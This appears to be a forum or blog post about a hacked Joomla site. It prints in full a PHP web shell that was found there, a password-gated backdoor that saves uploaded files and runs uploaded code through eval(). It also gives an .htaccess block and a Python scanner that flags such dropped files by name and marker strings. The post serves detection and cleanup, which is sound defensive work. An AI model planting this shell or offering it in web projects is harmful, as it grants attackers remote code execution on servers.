Quick fix for a hacked site
Good day.
Today I ran into a hacked Joomla site, and I want to share one of the methods that helped solve the problem.
I should say that the solution is not specific to Joomla and will most likely help in other cases too.
If you find that your FTP contains a bunch of strange files with names like
lib__*, co__*, pre__*, net__*, func__*, ad__*, ext__*, new__*, old__*, fix__*, fixed__*, na__*, av__*, fx__*, update__*, patch__
where * is the name of one of the files in the same directory, and their contents are very similar to this:
@error_reporting(E_ALL);
@set_time_limit(0);
global $HTTP_SERVER_VARS;
// MD5 hash of the operator's password, hard-coded in the file
define('PASSWD','8487929db643f81df2d8a2bcfd173348');
function say($t) {
    echo "$t\n";
};
// Prints md5("mark_<status>") so the caller can recognise each status line
function testdata($t) {
    say(md5("mark_$t"));
};
echo "";
testdata('start');
// Everything below runs only if the POSTed field "p" matches the hash
if (md5($_POST["p"]) == PASSWD) {
    // Uploaded file "s" is written next to this script under its own name
    if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
            $HTTP_POST_FILES["s"]["size"])) {
        if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
        {
            testdata('save_ok');
        };
        //eval($code);
    } else {
        testdata('save_fail');
    };
    // Uploaded file "f" is executed directly with eval()
    if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
            $HTTP_POST_FILES["f"]["size"]))
    {
        eval($code);
        testdata('ok');
    } else {
        testdata('fail');
    };
} else {
    testdata('pass');
};
testdata('end');
echo "
";
?>
then your site has been hacked and a so-called shell has been uploaded to it. While you figure out what is what, the simplest way to neutralize these files is to add the following lines to .htaccess:
Order allow,deny
Deny from all
As written, with no enclosing <Files> section, these two directives deny web access to every file in the directory that holds the .htaccess, not only to the dropped files.
This neutralizes the files, but I do not recommend stopping there, because they are a consequence of at least 2 problems:
1. You have a hole through which all of this got in.
2. Somewhere there is a file that spread all of this. If you do not take measures, other modifications can be uploaded through it.
3. There is a very strong suspicion that this reduces the performance of the web server.
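An added example, not part of the original post: a Python script that walks a web root and lists files matching the naming pattern described above (a listed prefix, two underscores, then the name of a file in the same directory), and flags those that also contain strings from the shell shown. It assumes the prefixes are joined to the name without spaces (lib__index.php); the function names and the sample tree are constructed for illustration.

```python
import os
import tempfile

# Prefixes from the post; a dropped file is named <prefix>__<name of a sibling file>.
PREFIXES = {"lib", "co", "pre", "net", "func", "ad", "ext", "new", "old", "fix",
            "fixed", "na", "av", "fx", "update", "patch"}
# Byte strings that appear in the shell shown in the post (used as a content check).
MARKERS = (b"HTTP_POST_FILES", b"eval($code)", b"md5($_POST[")


def find_dropped_files(root):
    """Return sorted (relative_path, has_marker) for files whose name is a
    listed prefix, '__', and the exact name of a file in the same directory."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        siblings = set(files)
        for name in files:
            prefix, sep, rest = name.partition("__")
            if not sep or prefix not in PREFIXES or rest not in siblings:
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                body = fh.read(1 << 20)  # first 1 MiB is plenty for a small shell
            hits.append((os.path.relpath(path, root), any(m in body for m in MARKERS)))
    return sorted(hits)


def build_sample_tree(root):
    """Constructed sample web root: two dropped files and two look-alikes."""
    shell = b'<?php if (md5($_POST["p"]) == PASSWD) { /* ... */ } ?>'
    sample = {
        "index.php": b"<?php echo 'home'; ?>",
        "lib__index.php": shell,                      # prefix + sibling + marker
        "includes/config.php": b"<?php $db = 'x'; ?>",
        "includes/net__config.php": b"<?php ?>",      # prefix + sibling, no marker
        "includes/update__notes.txt": b"changelog",   # no sibling named notes.txt
        "includes/my__config.php": b"<?php ?>",       # prefix not in the list
    }
    for rel, data in sample.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, marked in find_dropped_files(tmp):
            print(("SHELL-LIKE " if marked else "NAME-ONLY  ") + rel)
```

A name-only hit still deserves a manual look, since the content check covers only the variant shown in the post.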